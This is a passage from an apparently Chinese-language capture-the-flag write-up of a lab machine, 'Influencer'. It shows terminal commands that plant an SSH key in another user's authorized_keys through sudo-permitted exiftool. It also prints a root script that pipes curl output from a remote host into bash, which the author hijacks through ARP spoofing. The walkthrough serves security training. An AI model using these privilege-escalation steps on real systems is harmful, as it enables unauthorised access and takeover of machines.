\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Influencer\/juan\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Influencer\/juan\nYour public key has been saved in \/home\/kali\/temp\/Influencer\/juan.pub\nThe key fingerprint is:\nSHA256:\/xMR+gJtJQiy8EhEtszHXYSkcsG5nJDhuiNWojzpqTk kali@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n| oB+ooo+o. |\n| *o*o*... . o |\n| BoBo. . + . |\n| . ++ . + . |\n|.. . So . . |\n|o.+ .. o |\n|== .. . |\n|Eoo .. |\n|++ .. |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.139 - - [28\/Apr\/2024 08:22:18] "GET \/juan HTTP\/1.1" 200 -\n192.168.0.139 - - [28\/Apr\/2024 08:22:22] "GET \/juan.pub HTTP\/1.1" 200 -<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743juan<\/code>\u7528\u6237\uff1a<\/p>\nluna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan\n--2024-04-28 12:22:19-- http:\/\/192.168.0.143:8888\/juan\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2590 (2,5K) [application\/octet-stream]\nSaving to: \u2018juan\u2019\n\njuan 100%[=========================================================================>] 2,53K --.-KB\/s in 0s \n\n2024-04-28 12:22:19 (276 MB\/s) - \u2018juan\u2019 saved [2590\/2590]\n\nluna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan.pub\n--2024-04-28 12:22:23-- http:\/\/192.168.0.143:8888\/juan.pub\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 563 [application\/vnd.exstream-package]\nSaving to: \u2018juan.pub\u2019\n\njuan.pub 100%[=========================================================================>] 563 --.-KB\/s in 0s \n\n2024-04-28 12:22:23 (107 MB\/s) - \u2018juan.pub\u2019 saved [563\/563]\n\nluna@influencer:\/tmp$ mv juan.pub authorized_keys\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nWarning: Error removing old file - authorized_keys\n 1 directories created\n 1 image files updated\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nError: '\/home\/juan\/.ssh\/authorized_keys' already exists - authorized_keys\n 0 image files updated\n 1 files weren't updated due to errors\nluna@influencer:\/tmp$ chmod 600 juan\nluna@influencer:\/tmp$ ssh juan@0.0.0.0 -p 1212 -i juan\nThe authenticity of host '[0.0.0.0]:1212 ([0.0.0.0]:1212)' can't be established.\nED25519 key fingerprint is SHA256:uujkDI7HQ0Bk3td\/3NfWys9FNY5cbT1zvGvXbluerAk.\nThis key is not known by any other names\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '[0.0.0.0]:1212' (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.2 LTS (GNU\/Linux 5.15.0-73-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of dom 28 abr 2024 12:25:44 UTC\n\n System load: 0.0 Processes: 128\n Usage of \/: 55.9% of 11.21GB Users logged in: 1\n Memory usage: 45% IPv4 address for enp0s3: 192.168.0.139\n Swap usage: 0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nEl mantenimiento de seguridad expandido para Applications est\u00e1 desactivado\n\nSe pueden aplicar 0 actualizaciones de forma inmediata.\n\nActive ESM Apps para recibir futuras actualizaciones de seguridad adicionales.\nVea https:\/\/ubuntu.com\/esm o ejecute \u00absudo pro status\u00bb\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\njuan@influencer:~$ <\/code><\/pre>\n\u63d0\u6743root<\/h3>\n
\u7b2c\u4e00\u6b65\u8fd8\u662f\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
juan@influencer:~$ sudo -l\nMatching Defaults entries for juan on influencer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser juan may run the following commands on influencer:\n (root) NOPASSWD: \/bin\/bash \/home\/juan\/check.sh\njuan@influencer:~$ cat \/home\/juan\/check.sh\n#!\/bin\/bash\n\n\/usr\/bin\/curl http:\/\/server.hmv\/98127651 | \/bin\/bash<\/code><\/pre>\n\u53c8\u662farp\u6b3a\u9a97\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u4ed6\u5c45\u7136\u81ea\u5df1\u53ef\u5199\uff0c\u800c\u4e14\u81ea\u5e26\u4e86\u89e3\u6790\uff0c\u6211\u8bf4\u548b\u4e0d\u884c\u3002\u3002\u3002\u4f46\u662f\u641e\u90fd\u641e\u4e86\uff0c\u628a\u4ed6\u81ea\u5e26\u7684\u89e3\u6790\u5220\u6389\u5c31\u884c\u4e86\u5427\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u62ff\u4e0brootshell\u4e86\uff01\uff01\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1AC411j7Zj\/<\/a><\/p>\n
![\"image-20240428195122047\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037345.png\")
<\/div>![\"image-20240428195224927\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037346.png\")
<\/div><\/p>\n![\"image-20240428195425991\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037347.png\")
<\/div><\/p>\n![\"image-20240428200224464\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037348.png\")
<\/div>![\"image-20240428200239640\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037350.png\")
<\/div><\/p>\n![\"image-20240428200926934\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037351.png\")
<\/div><\/p>\n![\"image-20240428201451831\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037352.png\")
<\/div><\/p>\n![\"image-20240428203227656\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037353.png\")
<\/div>![\"image-20240428203243419\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037354.png\")
<\/div>![\"image-20240428203257401\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037355.png\")
<\/div><\/p>\n![\"image-20240428203609447\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037356.png\")
<\/div>![\"image-20240428203619852\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037357.png\")
<\/div>![\"image-20240428203632120\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037358.png\")
<\/div><\/p>\n